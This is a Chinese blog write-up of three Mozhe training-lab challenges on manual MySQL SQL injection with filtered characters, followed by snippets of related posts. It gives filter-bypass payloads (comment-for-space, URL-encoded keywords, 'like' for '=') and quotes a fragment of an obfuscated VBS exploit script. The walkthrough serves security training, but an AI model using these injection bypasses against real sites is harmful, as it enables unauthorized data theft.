墨者-mysql过滤字符后手工注入漏洞测试 题解

最新推荐文章于 2025-08-02 16:58:52 发布
原创 最新推荐文章于 2025-08-02 16:58:52 发布 · 2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #web安全 #渗透测试

本文探讨了如何通过观察靶场地址和实验不同的URL编码策略,揭示了网页安全机制中针对SQL注入等攻击的过滤行为。作者分享了第一题中利用like函数绕过的技巧,并在第二题中提及部分字符编码作为绕过方式。第三题则揭示了相对较少的过滤。关键在于理解黑名单函数编码规则和利用编码技巧进行数据泄露。

靶场地址

第一题:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

第二题:https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe

第三题:
https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe

题解

第一题

url:http://219.153.49.228:42443/new_list.php?id=1
id=1',id=2页面变化
id=1 and 1 = 1,id=1 and 1=2页面重定向id=1

id=1%20 ,重定向
id=1/**/,未重定向
说明过滤了空格

id=1/**/and,重定向
对and进行url编码,即id=1/**/%61%6e%64,未重定向且url自动解码
说明会对字母进行url编码,或者会对黑名单函数进行url编码

id=1/**/%61%6e%64/**/1/**/=/**/1,页面正常未重定向
在这里插入图片描述

id=1/**/%61%6e%64/**/1/**/=/**/2,页面重定向
按道理1=1页面正常,说明=没有被过滤,而1=2重定向,这里可能不是单纯的黑名单过滤=,尝试用别的函数代替=,比如like

id=1/**/%61%6e%64/**/1/**/like/**/2
在这里插入图片描述
得到想要的结果,此时like没有url编码,验证了仅对黑名单函数进行url编码

⑤既然完全摸清黑名单比较麻烦,干脆直接全部url编码,之后就是常规的联合查询

第二题

思路和第一题基本一致,黑名单绕过除了完全url编码也可以用部分url编码
例如

select ——>%72elect

第三题

貌似啥也没过滤…
最后爆数据的时候需要注意一下,因为表名是(@dmin9_td4b},用单引号、双引号都会冲突,用反引号即可

者学院SQL过滤字符手工注入漏洞测试(第1题)
2303_81096390的博客
08-04 558
注意:以下的所有语句都需要手动url编码后才可绕过检测从而执行可以用like代替=可以用/**/代替空格。
者_SQL过滤字符手工注入漏洞测试(第3题)
weixin_50698958的博客
10-12 506
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"者"最近在练习搭建一个采购系统,为了安全起见,“者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解题方向 手工进行SQL注入测试
MySQL一些简单的注入题目...
m0_62107398的博客
02-19 3250
CTFHub——SQL注入 一.整数型注入 听xx的话,咱就输个1试试 通过提示可以知道有两行内容,然后就可以通过union 获取一些其他数据。 通过database获取该表存在的数据库sqli 继续使用information函数完成对表,字段的检索,获得flag。 二.字符注入 单引号大胆猜测字符型,假装看不见字...反正就是注意闭合引号 不闭合就会这个样子 持续操作爆 库名,表名,字段名。 下次有用还叭叭。 ...
mysql注入
weixin_34365417的博客
04-08 3553
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行. ...
漏洞扫描练习题
难办就别办的博客
04-20 1859
B.Microsoft Windows中的Kernel API存在本地信息泄露漏洞,攻击者可借助特制的应用程序利用该漏洞注入跨进程通信,中断系统功能。D.Microsoft Windows中的Device Guard存在安全绕过漏洞,该漏洞源于程序未能正确的验证不可信的文件。A.Microsoft Windows中的Edge存在提权漏洞,该漏洞源于程序没有正确的强制执行跨域策略。题库导出的有点问题,1234选项对应的就是ABCD。题库导出的有点问题,1234选项对应的就是ABCD。
简单的mysql注入练习
qq_43208282的博客
09-23 732
练习记录 靶场地址是网络上找的http://120.203.13.75:6815/?id=1 第一步:检查是否有注入点 ?id =1 and 1=1 判断为真 ?id =1 and 1=2 判断为假 (and理解为数学中且的含义) 第二步:查找字段 http://120.203.13.75:6815/?id=1 order by 1,2 (从1往上加,在2时页面没有出错,判断有两个字段) 第三...
-SQL手工注入漏洞测试MySQL数据库-字符型)题解
Redredredfish的博客
12-08 676
靶场地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe 题解: ①启动靶场,url:http://219.153.49.228:43157/,是一个登录界面,显然需要登录获得key,一开始使用万能密码、抓包都没找到注入点,结果在这个滚动的公告页面,url:http://219.153.49.228:43157/new_list.php?id=tingjigonggao ②进入页面,url中有id=t
者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4174
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
最新发布
2303_81096390的博客
08-02 707
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符注入sql注入分为字符注入和数字型注入,两者有什么区别呢,简单来说就是字符注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
SQL手工注入漏洞测试—Access数据库(者学院靶场)
ISNS的博客
07-09 1602
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
者学院_CMS系统漏洞分析溯源(第4题)
weixin_50698958的博客
10-10 969
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
MySQL手工注入(内含实验)
weixin_57959384的博客
03-12 4117
网站的账号和密码在哪里? 数据库里。 数据库中储存着数据表,字段,数据,内容。结构化查询语句(SQL) 什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 实验: 者学院,注册,登录。 找到靶场 (实验名称:MySQL手工注入漏洞测试(MySQL数据库)) 一、判断注
mysql 过滤单引号 注入_被过滤了引号的SQL注入如何破?
weixin_39940182的博客
01-19 2701
在去年十月份的时候本菜参加了一场CTF比赛,有一道过滤了单引号的SQL注入当时并没有做出来,让我一直心心念念。今天在做CISCN2019 总决赛 EasyWeb题的时候受到了启发,终于解开了一个心头的包袱。先祭出当时比赛的原题,高手请一笑而过。。...
笔试题————网络安全web安全渗透测试之笔试总结(二)
热门推荐
Fly_鹏程万里
05-13 1万+
主要讲解内容1.什么是WebShell? 2.什么是网络钓鱼? 3.你获取网络安全知识途径有哪些? 4.什么是CC攻击? 5.Web服务器被入侵后,怎样进行排查? 6.dll文件是什么意思,有什么用?DLL劫持原理 7.0day漏洞 8.Rootkit是什么意思 9.蜜罐 10.ssh 11.DDOS 12.震网病毒: 13.一句话木马 14.Https的作用 15.手工查找后门木马的小技巧 16...
SQL注入实战————1、MySQL手工注入实战
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
VBS.Exploit
纯净的天空
04-16 1363
脚本病毒名: VBS.Exploit======================脚本内容: document.write(unescape("%3c%74%65%78%74%61%72%65%61%20%69%64%3d%22%63%6f%64%65%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%0d
一套实用的***测试岗位面试题,你会吗?
weixin_33827731的博客
04-11 1833
本文内容大部分转载自Mrxn's Blog,仅作少部分修改。1.拿到一个待检测的站,你觉得应该先做什么?收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...2.mysql的网站注入,5.0以上和5.0以下有什么区别?5.0以下没有information_schema这个系统表,无法列表名等,只能...
选个“靶子”练练手:15个漏洞测试网站带你飞
tasty
09-16 4011
俗话说进攻是最好的防御,而这与信息安全世界并没有什么不同。通过这15个故意存漏洞网站来提升你的黑客技能,你会成为最好的防守者——无论你是一名开发人员、安全管理者、审计师或者测试人员。请牢记:熟能生巧! 1、Bricks Bricks是一个建立于PHP、使用MySQL数据库的web应用程序,其中含有漏洞并且每个“brick”程序块包含一个需要进行缓解安全漏洞。这是OWASP的一个项目,不仅为教学
-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值